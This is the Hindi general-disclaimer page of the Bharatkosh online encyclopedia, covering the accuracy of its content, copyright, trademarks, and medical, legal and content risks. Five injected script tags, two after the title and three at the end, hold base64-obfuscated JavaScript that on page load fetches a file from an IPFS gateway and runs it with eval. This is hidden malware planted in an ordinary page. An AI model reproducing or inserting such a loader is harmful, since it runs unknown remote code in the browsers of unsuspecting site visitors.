भारतकोश:साधारण अस्वीकरण
<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>
<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>
भारतकोश को प्रामाणिक रखने का हमारा पूरा प्रयास है किन्तु योगदानकर्ता सदस्यों पर निर्भर होने के कारण विषय वस्तु की वैधता का कोई आश्वासन देना संभव नहीं है।
भारतकोश वेब पर आधारित सहयोग-प्राप्त एक ज्ञानकोश है, अर्थात् यह मानव ज्ञान का आम संसाधन विकसित करने के लिए व्यक्तियों तथा समूहों का एक स्वैच्छिक संगठन है। इस परियोजना की संरचना अंतर्जाल संयोजन के साथ किसी भी व्यक्ति को इसकी सामग्री परिवर्तित करने की अनुमति देती है। कृपया यह ध्यान रखें कि यह आवश्यक नहीं है कि यहाँ पाई गई सामग्री की विशेषज्ञों द्वारा सही तथा विश्वसनीय जानकारी देने के लिए समीक्षा की गई हो।
इसका यह तात्पर्य नहीं है कि आपको भारतकोश पर मूल्यवान तथा सही जानकारी नहीं मिलेगी। अधिकांशतः यह सही ही होगी। लेकिन, भारतकोश आपको यहाँ पाई गई जानकारी की सत्यता के बारे में आश्वासन नहीं दे सकता। किसी भी लेख की सामग्री को हटाया जा सकता है, उत्पात का शिकार हो सकती है अथवा ऐसे व्यक्ति द्वारा बदली जा सकती है जो उस संगत क्षेत्र में ज्ञान की अवस्था से भिन्न विचार रखता हो। किन्तु निश्चिंत रहें इस प्रकार के अपरिपक्व सम्पादनों से प्रभावित लेखों को फिर से अपनी मूल अवस्था में जल्द ही कर दिया जाता है।
कोई औपचारिक व्यक्तिगत समीक्षा नहीं
हम लेखों के विश्वनीय संस्करण चुनने तथा उनको आकर्षक बनने के तरीकों पर कार्य कर रहे हैं। हमारे सम्पादकों का सक्रिय समुदाय नई तथा बदलती सामग्री पर निगाह रखने के लिये हाल में हुए बदलाव तथा नये पन्ने जैसे औज़ारों का प्रयोग करता है। हालाँकि भारतकोश की समीक्षा समान रूप से नहीं की जाती; यद्यपि पाठक (सदस्य) ग़लतियों को सुधार सकते हैं।
इन कारणों के चलते कोई भी योगदानकर्ता, प्रायोजक, प्रबन्धक अथवा भारतकोश से किसी भी प्रकार से जुड़ा कोई अन्य व्यक्ति किसी अनुपयुक्त जानकारी की उपस्थिति अथवा भारतकोश के पन्नों पर मौजूद सामग्री के लिए जवाबदेह या आपके द्वारा प्रयोग हेतु सामग्री के लिए ज़िम्मेदार नहीं ठहराया जा सकता।
सीमित प्रयोग अधिकार
'भारतकोश' को किये गये सभी योगदानों के "सर्वाधिकार सामान्यत: सुरक्षित" हैं। जो 'भारतकोश', 'भारतकोश' में योगदान कर्ता अथवा संदर्भ ग्रंथ में उल्लिखित पुस्तकों के लेखक अथवा प्रकाशकों से संबद्ध हैं। जिनका "विस्तृत उपयोग" बिना लिखित अनुमति के करना "सर्वाधिकार" का उल्लंघन होगा। .... और पढ़ें
ट्रेडमार्क
कोई भी ट्रेडमार्क, सर्विस मार्क, साँझे/संयुक्त मार्क, डिजाइन अधिकार अथवा इसी प्रकार के अधिकार जो कि भारतकोश के लेखों में व्यवस्थित किये जाते हैं, प्रयोग किये जाते हैं अथवा उद्धृत किये जाते हैं वे उनके क्रमशः मालिकों की मिल्क़ियत हैं। उनके यहाँ प्रयोग का अर्थ यह नहीं है कि आप उनके समान अथवा समान जानकारीपूर्ण प्रयोग के अतिरिक्त अन्य कार्यों हेतु प्रयोग कर सकें। अतः भारतकोश किसी अन्य रूप से सुरक्षित सामग्री के प्रयोग हेतु अधिकार प्रदान नहीं कर सकता।
व्यक्तित्व अधिकार
भारतकोश में ऐसी सामग्री है जिसमें एक पहचान योग्य व्यक्ति को चित्रित किया गया हो जो जीवित या हाल ही में मर चुके हों। उन चित्रों को किसी प्रकार से कहीं भी उपयोग करने की अनुमति देने से भारतकोश का कोई संबंध नहीं है।
जोखिम अस्वीकरण
- कृपया विदित रहे कि किसी "समय अन्तराल विशेष" में भारतकोश में पाई गई जानकारी ग़लत, खतरनाक, व्यसनी, अनैतिक अथवा गैरक़ानूनी हो सकती है।
- भारतकोश पर पाई गई कुछ जानकारी उन पाठकों के लिए ख़तरा उत्पन्न कर सकती है जो जानकारी को अपनी गतिविधियों अथवा अन्य तृतीय पक्षों के प्रयोग के लिए बढ़ावा देते हैं।
- भारतकोश का कोई भी लेखक, योगदानकर्ता, प्रायोजक, प्रबंधक अथवा भारतकोश से जुड़ा कोई भी व्यक्ति, आपके द्वारा इन लेखों में पाई गई जानकारी का प्रयोग करने के लिए, उत्तरदायी नहीं है।
चिकित्सा संबंधी अस्वीकरण
- सभी चिकित्सक इस बात की पैरवी करते है कि इंटरनेट पर उपलब्ध जानकारी द्वारा रोगी की चिकित्सा करना पूर्णत: अस्वास्थ्यजनक है।
- भारतकोश पर कई चिकित्सीय लेख हो सकते हैं; जो केवल विषय की जानकारी देने के लिए ही बनाए जाते हैं। अत: इस बात का कोई आश्वासन नहीं है कि उन में से कोई भी लेख पूर्णत: सही हो। इस बात की तनिक भी विश्वसनीयता नहीं है कि किसी लेख में उद्धृत कोई भी कथन सत्य, सही तथा सटीक है।
- इन में से अधिकतर लेख, पूर्ण अथवा आंशिक रूप से, अव्यवसायिकों द्वारा लिखे गए हैं। यद्यपि किसी दवा के बारे में कोई कथन सही हो सकता है, तथापि यह आवश्यक नहीं है कि यह आप पर अथवा आपके लक्षणों पर लागू हो। भारतकोश पर दी गई चिकित्सीय जानकारी सामान्य प्रकार की होती है, तथा यह एक व्यवसायिक चिकित्सक की सलाह के स्थान पर ग्रहण नहीं की जा सकती है। भारतकोश एक चिकित्सक नहीं है।
- भारतकोश के योगदानकर्ताओं, प्रबंधक, प्रशासक, तथा प्रायोजकों की इस वेबसाइट पर दी गई जानकरी का प्रयोग करने के परिणामस्वरूप उत्पन्न स्थिति का कोई उत्तरदायित्व नहीं है।
- भारतकोश की परियोजनायों के भागों को चिकित्सीय सलाह देने अथवा चिकित्सीय व्यवसाय में प्रयुक्त नहीं किया जाना चाहिए।
वैधानिक अस्वीकरण
- भारतकोश पर वैधानिक विषयों पर कई लेख हो सकते हैं; हालाँकि इस बात का कोई आश्वासन नहीं है कि कोई भी लेख पूर्णत: सही हो। इस बात का तनिक भी आश्वासन नहीं है कि वैधानिक विषयों पर लिखे गए लेख में दी गई कोई भी जानकारी सही, सटीक तथा सत्य है। विधि समय-काल परिस्थिति के अनुसार हर जगह भिन्न हो सकती है, तथा यह समय के साथ-साथ बदलती रहती है। यदि कोई कथन सही भी है, तो यह संभव है कि वह केवल लेख लिखने वाले व्यक्ति के क्षेत्र में ही सही हो। क़ानून बदले जा सकते हैं तथा भारतकोश पर पिछले अद्यतन के बाद से संशोधित किए जा सकते हैं।
- भारतकोश के योगदानकर्ताओं, प्रबंधक, प्रशासक, तथा प्रायोजकों की इस वेबसाइट पर दी गई जानकरी का प्रयोग करने के परिणामस्वरूप उत्पन्न स्थिति का कोई उत्तरदायित्व नहीं है।
- भारतकोश की किसी भी परियोजना पर दी गई जानकारी का वैधानिक राय देने, अथवा व्यवसाय में प्रयोग नहीं किया जाना चाहिए।
सामग्री अस्वीकरण
भारतकोश में कई विषयों पर बहुसंख्य लेख हैं। इन लेखों का अपेक्षाकृत बहुत कम अंश शिक्षण, सरकारी तथा व्यावसायिक संस्थानों एवं अभिभावकों द्वारा नियंत्रित किया जाता है।
- भारतकोश पर कुछ लेखों में ऐसी भाषा का प्रयोग किया जाता है, जिसे कुछ पाठकों द्वारा अभद्र, अश्लील एवं अपमानजनक माना जाता है।
- लेखों में ऐसे चित्र, ध्वनियाँ अथवा लिखित प्रतिरूप हो सकते हैं, जो कुछ सभ्यताओं द्वारा संरक्षित हो।
- भारतकोश में कई चित्र हैं, जिसमें से कुछ को कुछ पाठकों द्वारा आपत्तिजनक माना जा सकता है। उदाहरणस्वरूप, कुछ लेखों में हिंसा अथवा मानव शरीर के अंग चित्रित किए जा सकते हैं।
- भारतकोश पर बहुत से लेख वैदिक कालीन, पौराणिक कालीन साहित्य के भी है। जिनमें अनेक धर्मों, सम्प्रदायों, जातियों का विवेचन भिन्न-भिन्न प्रकार से किया गया है। अनेक संस्कार और आचार-विचार, समय और इतिहास के अनुसार आपत्तिजनक हो सकते हैं। इस प्रकार की जानकारी के परिणामस्वरूप उत्पन्न स्थिति का कोई उत्तरदायित्व 'भारतकोश' का नहीं है।
- भारतकोश पर चिकित्सीय, वैधानिक अथवा अन्य जानकारी हो सकती है, जो कि सामान्यतः पेशेवरों के अनुसार होती है। भारतकोश पर प्रस्तुत जानकारी को पेशेवरों की सलाह के स्थान पर ग्रहण नहीं किया जा सकता। कृपया ध्यान दें: भारतकोश चिकित्सीय अथवा वैधानिक जानकारी नहीं देता है।
- भारतकोश पर त्रुटियाँ पाई जा सकती हैं। भारतकोश एक जारी कार्यक्रम है, तथा कई लेखों में त्रुटियाँ, पूर्वाग्रह, प्रतिरूप मौजूद हैं। हम पाठकों को इन समस्याओं से निजाद पाने में सहायता करने के लिए प्रोत्साहित करते हैं। अधिकांशतः लेख पूर्ण अथवा आंशिक रूप से ऐसे व्यक्तियों द्वारा लिखे जाते हैं, जो विशेषज्ञ नहीं हैं, तथा जिनमें शैक्षणिक अथवा व्यावसायिक योग्यताओं की कमी पाई जा सकती है।
वर्णमाला क्रमानुसार लेख खोज
<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>
<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>
<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>